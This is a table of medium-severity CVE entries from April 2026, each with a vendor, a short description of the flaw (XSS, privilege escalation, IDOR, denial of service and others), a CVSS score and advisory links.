| Synology--Synology SSL VPN Client | A files or directories accessible to external parties vulnerability in Synology SSL VPN Client before 1.4.5-0684 allows remote attackers to access files within the installation directory via a local HTTP server bound to the loopback interface. By leveraging user interaction with a crafted web page, attackers may retrieve sensitive files such as configuration files, certificates, and logs, leading to information disclosure. | 2026-04-10 | 6.5 | CVE-2021-47960 | Synology-SA-26:05 Synology SSL VPN Client |
| Adivaha--WordPress adivaha Travel Plugin | WordPress adivaha Travel Plugin 2.3 contains a reflected cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts by manipulating the isMobile parameter. Attackers can craft malicious URLs containing JavaScript payloads in the isMobile GET parameter at the /mobile-app/v3/ endpoint to execute arbitrary code in victims' browsers and steal session tokens or credentials. | 2026-04-09 | 6.1 | CVE-2023-54358 | ExploitDB-51663 Official Product Homepage Product Reference VulnCheck Advisory: WordPress adivaha Travel Plugin 2.3 Reflected XSS via isMobile |
| Jlexart--Joomla JLex Review | Joomla JLex Review 6.0.1 contains a reflected cross-site scripting vulnerability that allows attackers to inject malicious scripts by manipulating the review_id URL parameter. Attackers can craft malicious links containing JavaScript payloads that execute in victims' browsers when clicked, enabling session hijacking or credential theft. | 2026-04-09 | 6.1 | CVE-2023-54360 | ExploitDB-51645 Official Product Homepage Product Reference VulnCheck Advisory: Joomla JLex Review 6.0.1 Reflected XSS via review_id Parameter |
| Thethinkery--Joomla iProperty Real Estate | Joomla iProperty Real Estate 4.1.1 contains a reflected cross-site scripting vulnerability that allows attackers to inject malicious scripts by manipulating the filter_keyword parameter. Attackers can craft URLs containing JavaScript payloads in the filter_keyword GET parameter of the all-properties-with-map endpoint to execute arbitrary code in victim browsers and steal session tokens or credentials. | 2026-04-09 | 6.1 | CVE-2023-54361 | ExploitDB-51640 Official Product Homepage Product Reference VulnCheck Advisory: Joomla iProperty Real Estate 4.1.1 Reflected XSS via filter_keyword |
| Virtuemart--Cart | Joomla VirtueMart Shopping-Cart 4.0.12 contains a reflected cross-site scripting vulnerability that allows attackers to inject malicious scripts by manipulating the keyword parameter. Attackers can craft malicious URLs containing script payloads in the keyword parameter of the product-variants endpoint to execute arbitrary JavaScript in victim browsers and steal session tokens or credentials. | 2026-04-09 | 6.1 | CVE-2023-54362 | ExploitDB-51631 Official Product Homepage Product Reference VulnCheck Advisory: Joomla VirtueMart Shopping-Cart 4.0.12 Reflected XSS via keyword |
| Solidres--Joomla Solidres | Joomla Solidres 2.13.3 contains a reflected cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts by manipulating multiple GET parameters including show, reviews, type_id, distance, facilities, categories, prices, location, and Itemid. Attackers can craft malicious URLs containing JavaScript payloads in these parameters to steal session tokens, login credentials, or manipulate site content when victims visit the crafted links. | 2026-04-09 | 6.1 | CVE-2023-54363 | ExploitDB-51638 Official Product Homepage Product Reference VulnCheck Advisory: Joomla Solidres 2.13.3 Reflected XSS via Multiple Parameters |
| Hikashop--Joomla HikaShop | Joomla HikaShop 4.7.4 contains a reflected cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts by manipulating GET parameters in the product filter endpoint. Attackers can craft malicious URLs containing XSS payloads in the from_option, from_ctrl, from_task, or from_itemid parameters to steal session tokens or login credentials when victims visit the link. | 2026-04-09 | 6.1 | CVE-2023-54364 | ExploitDB-51629 Official Product Homepage Product Reference VulnCheck Advisory: Joomla HikaShop 4.7.4 Reflected XSS via Product Filter |
| IBM--Concert | IBM Concert 1.0.0 through 2.2.0 creates temporary files with predictable names, which allows local users to overwrite arbitrary files via a symlink attack. | 2026-04-07 | 6.2 | CVE-2025-13044 | https://www.ibm.com/support/pages/node/7268620 |
| elemntor--Elementor Website Builder more than just a page builder | The Elementor Website Builder - More Than Just a Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several widget parameters in all versions up to, and including, 3.35.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-04-08 | 6.4 | CVE-2025-14732 | https://www.wordfence.com/threat-intel/vulnerabilities/id/20232d70-72b2-47b7-ac7e-ad07892864ef?source=cve https://plugins.trac.wordpress.org/browser/elementor/trunk/modules/wp-rest/classes/elementor-post-meta.php#L67 https://plugins.trac.wordpress.org/changeset?old_path=/elementor/tags/3.35.5&new_path=/elementor/tags/3.35.6 |
| Juniper Networks--Junos OS | A Missing Authentication for Critical Function vulnerability in command processing of Juniper Networks Junos OS allows a privileged local attacker to gain access to line cards running Junos OS Evolved as root. This issue affects systems running Junos OS using Linux-based line cards. Affected line cards include: * MPC7, MPC8, MPC9, MPC10, MPC11 * LC2101, LC2103 * LC480, LC4800, LC9600 * MX304 (built-in FPC) * MX-SPC3 * SRX5K-SPC3 * EX9200-40XS * FPC3-PTX-U2, FPC3-PTX-U3 * FPC3-SFF-PTX * LC1101, LC1102, LC1104, LC1105 This issue affects Junos OS: * all versions before 22.4R3-S8, * from 23.2 before 23.2R2-S6, * from 23.4 before 23.4R2-S6, * from 24.2 before 24.2R2-S3, * from 24.4 before 24.4R2, * from 25.2 before 25.2R2. | 2026-04-08 | 6.7 | CVE-2025-30650 | https://github.com/orangecertcc/security-research/security/advisories/GHSA-fwhc-gh5m-v8fq https://kb.juniper.net/JSA107863 |
| Qualcomm, Inc.--Snapdragon | Memory Corruption when accessing freed memory due to concurrent fence deregistration and signal handling. | 2026-04-06 | 6.5 | CVE-2025-47374 | https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html |
| Siklu--EtherHaul 8010 | Siklu EtherHaul 8010 siklu-uimage-nxp-enc-10_6_2-18707-ea552dc00b devices have a static root password. | 2026-04-08 | 6.4 | CVE-2025-57175 | https://semaja2.net/2025/04/30/siklu-eh-firmware-decryption/ |
| Red Hat--Red Hat Ansible Automation Platform 2 | A container privilege escalation flaw was found in certain Ansible Automation Platform images. This issue arises from the /etc/passwd file being created with group-writable permissions during the build process. In certain conditions, an attacker who can execute commands within an affected container, even as a non-root user, can leverage their membership in the root group to modify the /etc/passwd file. This vulnerability allows an attacker to add a new user with any arbitrary UID, including UID 0, gaining full root privileges within the container. | 2026-04-08 | 6.4 | CVE-2025-57847 | https://access.redhat.com/security/cve/CVE-2025-57847 RHBZ#2391092 |
| Red Hat--Multicluster Engine for Kubernetes | A container privilege escalation flaw was found in certain Multicluster Engine for Kubernetes images. This issue stems from the /etc/passwd file being created with group-writable permissions during build time. In certain conditions, an attacker who can execute commands within an affected container, even as a non-root user, can leverage their membership in the root group to modify the /etc/passwd file. This could allow the attacker to add a new user with any arbitrary UID, including UID 0, leading to full root privileges within the container. | 2026-04-08 | 6.4 | CVE-2025-57851 | https://access.redhat.com/security/cve/CVE-2025-57851 RHBZ#2391104 |
| Red Hat--Red Hat Web Terminal | A container privilege escalation flaw was found in certain Web Terminal images. This issue stems from the /etc/passwd file being created with group-writable permissions during build time. In certain conditions, an attacker who can execute commands within an affected container, even as a non-root user, can leverage their membership in the root group to modify the /etc/passwd file. This could allow the attacker to add a new user with any arbitrary UID, including UID 0, leading to full root privileges within the container. | 2026-04-08 | 6.4 | CVE-2025-57853 | https://access.redhat.com/security/cve/CVE-2025-57853 RHBZ#2391106 |
| Red Hat--Red Hat OpenShift Update Service | A container privilege escalation flaw was found in certain OpenShift Update Service (OSUS) images. This issue stems from the /etc/passwd file being created with group-writable permissions during build time. In certain conditions, an attacker who can execute commands within an affected container, even as a non-root user, may be able to leverage their membership in the root group to modify the /etc/passwd file. This could allow the attacker to add a new user with any arbitrary UID, including UID 0, leading to full root privileges within the container. | 2026-04-08 | 6.4 | CVE-2025-57854 | https://access.redhat.com/security/cve/CVE-2025-57854 RHBZ#2391107 |
| Red Hat--Red Hat Process Automation 7 | A container privilege escalation flaw was found in certain Red Hat Process Automation Manager images. This issue stems from the /etc/passwd file being created with group-writable permissions during build time. In certain conditions, an attacker who can execute commands within an affected container, even as a non-root user, can leverage their membership in the root group to modify the /etc/passwd file. This could allow the attacker to add a new user with any arbitrary UID, including UID 0, leading to full root privileges within the container. | 2026-04-08 | 6.4 | CVE-2025-58713 | https://access.redhat.com/security/cve/CVE-2025-58713 RHBZ#2394419 |
| Juniper Networks--Junos OS Evolved | A Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') vulnerability in the advanced forwarding toolkit (evo-aftmand/evo-pfemand) of Juniper Networks Junos OS Evolved on PTX Series or QFX5000 Series allows an unauthenticated, adjacent attacker to cause a Denial of Service (DoS). An attacker sending crafted multicast packets will cause line cards running evo-aftmand/evo-pfemand to crash and restart, or non-line card devices to crash and restart. Continued receipt and processing of these packets will sustain the Denial of Service (DoS) condition. This issue affects Junos OS Evolved PTX Series: * All versions before 22.4R3-S8-EVO, * from 23.2 before 23.2R2-S5-EVO, * from 23.4 before 23.4R2-EVO, * from 24.2 before 24.2R2-EVO, * from 24.4 before 24.4R2-EVO. This issue affects Junos OS Evolved on QFX5000 Series: * 22.2-EVO version before 22.2R3-S7-EVO, * 22.4-EVO version before 22.4R3-S7-EVO, * 23.2-EVO versions before 23.2R2-S4-EVO, * 23.4-EVO versions before 23.4R2-S5-EVO, * 24.2-EVO versions before 24.2R2-S1-EVO, * 24.4-EVO versions before 24.4R1-S3-EVO, 24.4R2-EVO. This issue does not affect Junos OS Evolved on QFX5000 Series versions before: 21.2R2-S1-EVO, 21.2R3-EVO, 21.3R2-EVO, 21.4R1-EVO, and 22.1R1-EVO. | 2026-04-09 | 6.5 | CVE-2025-59969 | https://kb.juniper.net/JSA103159 |
| GitLab--GitLab | GitLab has remediated an issue in GitLab EE affecting all versions from 18.2 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that could have allowed an authenticated user to cause denial of service to the GitLab instance due to improper input validation in GraphQL queries. | 2026-04-08 | 6.5 | CVE-2026-1101 | HackerOne Bug Bounty Report #3460228 https://gitlab.com/gitlab-org/gitlab/-/work_items/586488 https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-released/ |
| usystemsgmbh--Webling | The Webling plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 3.9.0 due to insufficient input sanitization, insufficient output escaping, and missing capabilities checks in the 'webling_admin_save_form' and 'webling_admin_save_memberlist' functions. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject Webling forms and memberlists with arbitrary web scripts that will execute whenever an administrator views the related form or memberlist area of the WordPress admin. | 2026-04-10 | 6.4 | CVE-2026-1263 | https://www.wordfence.com/threat-intel/vulnerabilities/id/bd8fbe0d-0709-4fa2-9294-393ddcd05b22?source=cve https://plugins.trac.wordpress.org/browser/webling/tags/3.9.0/src/admin/lists/Form_List.php#L122 https://plugins.trac.wordpress.org/browser/webling/tags/3.9.0/src/admin/lists/Memberlist_List.php#L115 https://plugins.trac.wordpress.org/browser/webling/tags/3.9.0/src/admin/actions/save_form.php#L2 https://plugins.trac.wordpress.org/browser/webling/tags/3.9.0/src/admin/actions/save_memberlist.php#L2 https://plugins.trac.wordpress.org/changeset?old_path=%2Fwebling/tags/3.9.0&new_path=%2Fwebling/tags/3.9.1 |
| magicplugins--Magic Conversation For Gravity Forms | The Magic Conversation For Gravity Forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'magic-conversation' shortcode in all versions up to, and including, 3.0.97 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-04-08 | 6.4 | CVE-2026-1396 | https://www.wordfence.com/threat-intel/vulnerabilities/id/bc425c4a-cb4e-4f50-b85b-8c4c7778c073?source=cve https://plugins.trac.wordpress.org/browser/magic-conversation-for-gravity-forms/trunk/main.php#L1627 https://plugins.trac.wordpress.org/browser/magic-conversation-for-gravity-forms/tags/3.0.96/main.php#L1627 https://plugins.trac.wordpress.org/changeset/3482359/magic-conversation-for-gravity-forms/trunk/main.php |
| realmag777--BEAR Bulk Editor and Products Manager Professional for WooCommerce by Pluginus.Net | The BEAR - Bulk Editor and Products Manager Professional for WooCommerce by Pluginus.Net plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.5. This is due to missing nonce validation on the woobe_redraw_table_row() function. This makes it possible for unauthenticated attackers to update WooCommerce product data including prices, descriptions, and other product fields via a forged request granted they can trick a site administrator or shop manager into performing an action such as clicking on a link. | 2026-04-08 | 6.5 | CVE-2026-1672 | https://www.wordfence.com/threat-intel/vulnerabilities/id/bc3b5faa-1a29-4fa7-9146-d782adce0b1f?source=cve https://plugins.trac.wordpress.org/browser/woo-bulk-editor/trunk/index.php#L782 https://plugins.trac.wordpress.org/changeset/3457263/ https://plugins.trac.wordpress.org/changeset/3465138/ |
| wpeverest--User Registration & Membership Free & Paid Memberships, Subscriptions, Content Restriction, User Profile, Custom User Registration & Login Builder | The User Registration & Membership - Free & Paid Memberships, Subscriptions, Content Restriction, User Profile, Custom User Registration & Login Builder plugin for WordPress is vulnerable to SQL Injection via the 'membership_ids[]' parameter in all versions up to, and including, 5.1.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2026-04-08 | 6.5 | CVE-2026-1865 | https://www.wordfence.com/threat-intel/vulnerabilities/id/07c79459-66b8-4c93-a1cd-6e3ede95643f?source=cve https://plugins.trac.wordpress.org/changeset/3469042/user-registration |
| n/a--Intel(R) Pentium(R) Processor Silver Series, Intel(R) Celeron(R) Processor J Series, Intel(R) Celeron(R) Processor N Series | Use of Default Cryptographic Key in the hardware for some Intel(R) Pentium(R) Processor Silver Series, Intel(R) Celeron(R) Processor J Series, Intel(R) Celeron(R) Processor N Series may allow an escalation of privilege. Hardware reverse engineer adversary with a privileged user combined with a high complexity attack may enable escalation of privilege. This result may potentially occur via physical access when attack requirements are present with special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (high), integrity (none) and availability (none) of the vulnerable system, resulting in subsequent system confidentiality (high), integrity (high) and availability (none) impacts. | 2026-04-08 | 6.6 | CVE-2026-20709 | https://intel.com/content/www/us/en/security-center/advisory/intel-sa-00609.html |
| Juniper Networks--Junos Space | An Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Juniper Networks Junos Space allows an attacker to inject script tags in the list filter field that, when visited by another user, enables the attacker to execute commands with the target's permissions, including an administrator. This issue affects all versions of Junos Space before 24.1R5 Patch V3. | 2026-04-09 | 6.1 | CVE-2026-21904 | https://kb.juniper.net/JSA106003 |
| Juniper Networks--JSI LWC | A Permissive List of Allowed Input vulnerability in the CLI of Juniper Networks Support Insights (JSI) Virtual Lightweight Collector (vLWC) allows a local, high privileged attacker to escalate their privileges to root. The CLI menu accepts input without carefully validating it, which allows for shell command injection. These shell commands are executed with root permissions and can be used to gain complete control of the system. This issue affects all JSI vLWC versions before 3.0.94. | 2026-04-09 | 6.7 | CVE-2026-21915 | https://kb.juniper.net/JSA106016 |
| Juniper Networks--Junos OS | An Incorrect Synchronization vulnerability in the management daemon (mgd) of Juniper Networks Junos OS and Junos OS Evolved allows a network-based attacker with low privileges to cause a complete Denial-of-Service (DoS) of the management plane. When NETCONF sessions are quickly established and disconnected, a locking issue causes mgd processes to hang in an unusable state. When the maximum number of mgd processes has been reached, no new logins are possible. This leads to the inability to manage the device and requires a power-cycle to recover. This issue can be monitored by checking for mgd processes in lockf state in the output of 'show system processes extensive': `user@host> show system processes extensive \| match mgd` `<pid> root 20 0 501M 4640K lockf 1 0:01 0.00% mgd` If the system still can be accessed (either via the CLI or as root, which might still be possible as last resort as this won't invoke mgd), mgd processes in this state can be killed with `request system process terminate <PID>` from the CLI or with `kill -9 <PID>` from the shell. This issue affects: Junos OS: * 23.4 versions before 23.4R2-S4, * 24.2 versions before 24.2R2-S1, * 24.4 versions before 24.4R1-S3, 24.4R2; This issue does not affect Junos OS versions before 23.4R1; Junos OS Evolved: * 23.4 versions before 23.4R2-S5-EVO, * 24.2 versions before 24.2R2-S1-EVO, * 24.4 versions before 24.4R1-S3-EVO, 24.4R2-EVO. This issue does not affect Junos OS Evolved versions before 23.4R1-EVO; | 2026-04-09 | 6.5 | CVE-2026-21919 | https://kb.juniper.net/JSA106019 |
| addfunc--AddFunc Head & Footer Code | The AddFunc Head & Footer Code plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `aFhfc_head_code`, `aFhfc_body_code`, and `aFhfc_footer_code` post meta values in all versions up to, and including, 2.3. This is due to the plugin outputting these meta values without any sanitization or escaping. While the plugin restricts its own metabox and save handler to administrators via `current_user_can('manage_options')`, it does not use `register_meta()` with an `auth_callback` to protect these meta keys. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts via the WordPress Custom Fields interface that execute when an administrator previews or views the post. | 2026-04-10 | 6.4 | CVE-2026-2305 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2f2d1a67-1d9b-4b73-988e-085eaa7474c6?source=cve https://plugins.trac.wordpress.org/browser/addfunc-head-footer-code/tags/2.3/addfunc-head-footer-code.php#L63 https://plugins.trac.wordpress.org/browser/addfunc-head-footer-code/tags/2.3/addfunc-head-footer-code.php#L74 https://plugins.trac.wordpress.org/browser/addfunc-head-footer-code/tags/2.3/addfunc-head-footer-code.php#L85 https://plugins.trac.wordpress.org/browser/addfunc-head-footer-code/trunk/addfunc-head-footer-code.php#L63 https://plugins.trac.wordpress.org/browser/addfunc-head-footer-code/trunk/addfunc-head-footer-code.php#L74 https://plugins.trac.wordpress.org/browser/addfunc-head-footer-code/trunk/addfunc-head-footer-code.php#L85 https://plugins.trac.wordpress.org/changeset?old_path=%2Faddfunc-head-footer-code/tags/2.3&new_path=%2Faddfunc-head-footer-code/tags/2.4 |
| blubrry--PowerPress Podcasting plugin by Blubrry | The Blubrry PowerPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'powerpress' and 'podcast' shortcodes in versions up to, and including, 11.15.15 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-04-08 | 6.4 | CVE-2026-2988 | https://www.wordfence.com/threat-intel/vulnerabilities/id/de25459d-9e19-4e3e-982f-0b34fa89dc30?source=cve https://plugins.trac.wordpress.org/changeset/3473781/powerpress |
| fernandobt--List category posts | The List category posts plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'catlist' shortcode in all versions up to, and including, 0.94.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-04-09 | 6.4 | CVE-2026-3005 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1a93ff8a-364f-4ec4-9c32-208c7a3e1fc1?source=cve https://plugins.trac.wordpress.org/browser/list-category-posts/trunk/include/lcp-thumbnail.php#L95 https://plugins.trac.wordpress.org/changeset/3482733/ |
| uniquecodergmailcom--Pinterest Site Verification plugin using Meta Tag | The Pinterest Site Verification plugin using Meta Tag plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'post_var' parameter in versions up to, and including, 1.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-04-08 | 6.4 | CVE-2026-3142 | https://www.wordfence.com/threat-intel/vulnerabilities/id/7ccb7534-b588-4bdd-9627-0e38c0ee5e8a?source=cve https://plugins.trac.wordpress.org/browser/pinterest-site-verification/tags/1.8/PinterestMetaTagSiteVerification.php#L160 https://plugins.trac.wordpress.org/browser/pinterest-site-verification/trunk/PinterestMetaTagSiteVerification.php#L160 https://plugins.trac.wordpress.org/browser/pinterest-site-verification/tags/1.8/PinterestMetaTagSiteVerification.php#L172 https://plugins.trac.wordpress.org/browser/pinterest-site-verification/tags/1.8/PinterestMetaTagSiteVerification.php#L180 https://plugins.trac.wordpress.org/browser/pinterest-site-verification/tags/1.8/PinterestMetaTagSiteVerification.php#L92 https://plugins.trac.wordpress.org/browser/pinterest-site-verification/tags/1.8/PinterestMetaTagSiteVerification.php#L132 https://plugins.trac.wordpress.org/browser/pinterest-site-verification/tags/1.8/PinterestMetaTagSiteVerification.php#L214 |
| wpchill--Strong Testimonials | The Strong Testimonials plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's testimonial_view shortcode in all versions up to, and including, 3.2.21 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-04-08 | 6.4 | CVE-2026-3239 | https://www.wordfence.com/threat-intel/vulnerabilities/id/88d769cd-bea8-42e4-80a8-a77c0699b50c?source=cve https://plugins.trac.wordpress.org/changeset/3470120/strong-testimonials |
| posimyththemes--The Plus Addons for Elementor Addons for Elementor, Page Templates, Widgets, Mega Menu, WooCommerce | The The Plus Addons for Elementor - Addons for Elementor, Page Templates, Widgets, Mega Menu, WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Progress Bar shortcode in all versions up to, and including, 6.4.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-04-08 | 6.4 | CVE-2026-3311 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6367c5fc-f664-4105-a1b7-a93fb0a2392b?source=cve https://plugins.trac.wordpress.org/changeset/3473275/the-plus-addons-for-elementor-page-builder |
| chamilo--chamilo-lms | Chamilo LMS is a learning management system. Prior to 2.0.0-RC.3, an Insecure Direct Object Reference (IDOR) vulnerability in the REST API stats endpoint allows any authenticated user (including low-privilege students with ROLE_USER) to read any other user's learning progress, certificates, and gradebook scores for any course, without enrollment or supervisory relationship. This vulnerability is fixed in 2.0.0-RC.3. | 2026-04-10 | 6.5 | CVE-2026-33141 | https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-j2pr-2r5w-jrpj https://github.com/chamilo/chamilo-lms/commit/792ba05953470ca971617fe2674ed14c1479fa80 |
| pi-hole--web | Pi-hole Admin Interface is a web interface for managing Pi-hole, a network-level ad and internet tracker blocking application. From 6.0 to before 6.5, a reflected DOM-based XSS vulnerability in taillog.js allows an unauthenticated attacker to inject arbitrary HTML into the Pi-hole admin interface by crafting a malicious URL. The file query parameter is interpolated into an innerHTML assignment without escaping. Because the Content-Security-Policy is missing the form-action directive, injected `<form>` elements can exfiltrate credentials to an external origin. This vulnerability is fixed in 6.5. | 2026-04-06 | 6.1 | CVE-2026-33403 | https://github.com/pi-hole/web/security/advisories/GHSA-7xqw-r9pr-qv59 |
| Elastic--Kibana | Server-Side Request Forgery (CWE-918) in Kibana One Workflow can lead to information disclosure. An authenticated user with workflow creation and execution privileges can bypass host allowlist restrictions in the Workflows Execution Engine, potentially exposing sensitive internal endpoints and data. | 2026-04-08 | 6.8 | CVE-2026-33458 | https://discuss.elastic.co/t/kibana-9-3-3-security-update-esa-2026-28/385815 |
| Elastic--Kibana | Uncontrolled Resource Consumption (CWE-400) in Kibana can lead to denial of service via Excessive Allocation (CAPEC-130). An authenticated user with access to the automatic import feature can submit specially crafted requests with excessively large input values. When multiple such requests are sent concurrently, the backend services become unstable, resulting in service disruption and deployment unavailability for all users. | 2026-04-08 | 6.5 | CVE-2026-33459 | https://discuss.elastic.co/t/kibana-8-19-14-9-2-8-9-3-3-security-update-esa-2026-26/385814 |
| chamilo--chamilo-lms | Chamilo LMS is a learning management system. Prior to 1.11.38, the get_user_info_from_username REST API endpoint returns personal information (email, first name, last name, user ID, active status) of any user to any authenticated user, including students. There is no authorization check. This vulnerability is fixed in 1.11.38. | 2026-04-10 | 6.5 | CVE-2026-33708 | https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-qwch-82q9-q999 https://github.com/chamilo/chamilo-lms/commit/4a119f93abbfba6fe833580f2463c8d4afa500c2 |
| pi-hole--pi-hole | Pi-hole is a Linux network-level advertisement and Internet tracker blocking application. Version 6.4 has a local privilege-escalation vulnerability that allows code execution as root from the low-privilege pihole account. Important context: the pihole account uses nologin, so this is not a direct interactive-login issue. However, nologin does not prevent code from running as UID pihole if a Pi-hole component is compromised. In that realistic post-compromise scenario, attacker-controlled content in /etc/pihole/versions is sourced by root-run Pi-hole scripts, leading to root code execution. This vulnerability is fixed in 6.4.1. | 2026-04-06 | 6.4 | CVE-2026-33727 | https://github.com/pi-hole/pi-hole/security/advisories/GHSA-c935-8g63-qp74 |
| chamilo--chamilo-lms | Chamilo LMS is a learning management system. Prior to 2.0.0-RC.3, any authenticated user (including ROLE_STUDENT) can enumerate all platform users and access personal information (email, phone, roles) via GET /api/users, including administrator accounts. This vulnerability is fixed in 2.0.0-RC.3. | 2026-04-10 | 6.5 | CVE-2026-33736 | https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-fp2p-fj6c-x3x9 https://github.com/chamilo/chamilo-lms/commit/1739371ce1c562c007c7f5d53e6d65b7a4ff4109 |
| trailofbits--rfc3161-client | rfc3161-client is a Python library implementing the Time-Stamp Protocol (TSP) described in RFC 3161. Prior to 1.0.6, an Authorization Bypass vulnerability in rfc3161-client's signature verification allows any attacker to impersonate a trusted TimeStamping Authority (TSA). By exploiting a logic flaw in how the library extracts the leaf certificate from an unordered PKCS#7 bag of certificates, an attacker can append a spoofed certificate matching the target common_name and Extended Key Usage (EKU) requirements. This tricks the library into verifying these authorization rules against the forged certificate while validating the cryptographic signature against an actual trusted TSA (such as FreeTSA), thereby bypassing the intended TSA authorization pinning entirely. This vulnerability is fixed in 1.0.6. | 2026-04-08 | 6.2 | CVE-2026-33753 | https://github.com/trailofbits/rfc3161-client/security/advisories/GHSA-3xxc-pwj6-jgrj |
| Juniper Networks--Junos OS | An Improper Check for Unusual or Exceptional Conditions vulnerability in the packet forwarding engine (pfe) of Juniper Networks Junos OS on MX Series allows an unauthenticated, network-based attacker to bypass the configured firewall filter and access the control-plane of the device. On MX platforms with MPC10, MPC11, LC4800 or LC9600 line cards, and MX304, firewall filters applied on a loopback interface lo0.n (where n is a non-0 number) don't get executed when lo0.n is in the global VRF / default routing-instance. An affected configuration would be: user@host# show configuration interfaces lo0 | display set set interfaces lo0 unit 1 family inet filter input <filter-name> where a firewall filter is applied to a non-0 loopback interface, but that loopback interface is not referred to in any routing-instance (RI) configuration, which implies that it's used in the default RI. The issue can be observed with the CLI command: user@device> show firewall counter filter <filter_name> not showing any matches. This issue affects Junos OS on MX Series: * all versions before 23.2R2-S6, * 23.4 versions before 23.4R2-S7, * 24.2 versions before 24.2R2, * 24.4 versions before 24.4R2. | 2026-04-09 | 6.5 | CVE-2026-33774 | https://kb.juniper.net/JSA107865 |
| Juniper Networks--Junos OS | A Missing Release of Memory after Effective Lifetime vulnerability in the BroadBand Edge subscriber management daemon (bbe-smgd) of Juniper Networks Junos OS on MX Series allows an adjacent, unauthenticated attacker to cause a Denial of Service (DoS). If the authentication packet-type option is configured and a received packet does not match that packet type, the memory leak occurs. When all memory available to bbe-smgd has been consumed, no new subscribers will be able to login. The memory utilization of bbe-smgd can be monitored with the following show command: user@host> show system processes extensive | match bbe-smgd The below log message can be observed when this limit has been reached: bbesmgd[<PID>]: %DAEMON-3-SMD_DPROF_RSMON_ERROR: Resource unavailability, Reason: Daemon Heap Memory exhaustion This issue affects Junos OS on MX Series: * all versions before 22.4R3-S8, * 23.2 versions before 23.2R2-S5, * 23.4 versions before 23.4R2-S6, * 24.2 versions before 24.2R2-S2, * 24.4 versions before 24.4R2, * 25.2 versions before 25.2R2. | 2026-04-09 | 6.5 | CVE-2026-33775 | https://kb.juniper.net/JSA107821 |
| Juniper Networks--Junos OS | An Improper Following of a Certificate's Chain of Trust vulnerability in J-Web of Juniper Networks Junos OS on SRX Series allows a PITM to intercept the communication of the device and get access to confidential information and potentially modify it. When an SRX device is provisioned to connect to Security Director (SD) cloud, it doesn't perform sufficient verification of the received server certificate. This allows a PITM to intercept the communication between the SRX and SD cloud and access credentials and other sensitive information. This issue affects Junos OS: * all versions before 22.4R3-S9, * 23.2 versions before 23.2R2-S6, * 23.4 versions before 23.4R2-S7, * 24.2 versions before 24.2R2-S3, * 24.4 versions before 24.4R2-S2, * 25.2 versions before 25.2R1-S2, 25.2R2. | 2026-04-09 | 6.5 | CVE-2026-33779 | https://kb.juniper.net/JSA107823 |
| Juniper Networks--Junos OS | A Missing Release of Memory after Effective Lifetime vulnerability in the Layer 2 Address Learning Daemon (l2ald) of Juniper Networks Junos OS and Junos OS Evolved allows an adjacent, unauthenticated attacker to cause a memory leak ultimately leading to a Denial of Service (DoS). In an EVPN-MPLS scenario, routes learned from remote multi-homed Provider Edge (PE) devices are programmed as ESI routes. Due to a logic issue in the l2ald memory management, memory allocated for these routes is not released when there is churn for these routes. As a result, memory leaks in the l2ald process which will ultimately lead to a crash and restart of l2ald. Use the following command to monitor the memory consumption by l2ald: user@device> show system process extensive | match "PID|l2ald" This issue affects: Junos OS: * all versions before 22.4R3-S5, * 23.2 versions before 23.2R2-S3, * 23.4 versions before 23.4R2-S4, * 24.2 versions before 24.2R2; Junos OS Evolved: * all versions before 22.4R3-S5-EVO, * 23.2 versions before 23.2R2-S3-EVO, * 23.4 versions before 23.4R2-S4-EVO, * 24.2 versions before 24.2R2-EVO. | 2026-04-09 | 6.5 | CVE-2026-33780 | https://kb.juniper.net/JSA107819 |
